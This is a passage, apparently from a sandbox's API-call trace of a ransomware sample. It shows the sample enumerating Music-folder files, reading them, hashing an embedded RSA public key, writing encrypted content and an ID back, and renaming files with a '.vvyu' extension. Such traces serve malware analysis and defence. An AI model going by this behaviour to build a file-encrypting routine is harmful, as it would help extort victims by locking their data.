HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0187.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0187.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38a30 | out: hHeap=0x6a0000) returned 1 [0187.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.026] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x10e2a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x10e2a, lpOverlapped=0x0) returned 1 [0187.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.027] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10e2f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.027] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.029] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.029] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.029] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.029] CloseHandle (hObject=0x584) returned 1 [0187.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.031] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\qxLG6rlRsvYEmXiL.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qxlg6rlrsvyemxil.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\qxLG6rlRsvYEmXiL.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\qxlg6rlrsvyemxil.m4a.vvyu")) returned 1 [0187.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.033] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.036] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd0e1670, ftCreationTime.dwHighDateTime=0x1d8a0c5, ftLastAccessTime.dwLowDateTime=0x8a280af0, ftLastAccessTime.dwHighDateTime=0x1d8a6ae, ftLastWriteTime.dwLowDateTime=0x8a280af0, ftLastWriteTime.dwHighDateTime=0x1d8a6ae, nFileSizeHigh=0x0, nFileSizeLow=0x15f44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tRcMqrNBqTUs.mp3", cAlternateFileName="TRCMQR~1.MP3")) returned 1 [0187.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38a30 [0187.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38a30 | out: hHeap=0x6a0000) returned 1 [0187.037] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\tRcMqrNBqTUs.mp3") returned=".mp3" [0187.037] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\tRcMqrNBqTUs.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\trcmqrnbqtus.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.037] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=89924) returned 1 [0187.038] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.040] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15f1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.040] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.042] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.042] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x15f44, lpOverlapped=0x0) returned 1 [0187.045] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.045] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.045] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.045] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.046] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.046] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.046] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.046] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.046] GetLastError () returned 0x0 [0187.047] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.047] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.047] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.047] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.047] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15f40) returned 0x2d43778 [0187.048] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38a30 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38a78 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0187.049] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3bb48 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396a0 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d396b8 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.052] GetCurrentThreadId () returned 0x264 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37888 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.052] GetCurrentThreadId () returned 0x264 [0187.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0187.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0187.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396b8 [0187.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396e8 [0187.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39700 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39730 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39718 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39700 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396a0 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.056] HeapFree (in: hHeap=0x6a0000, 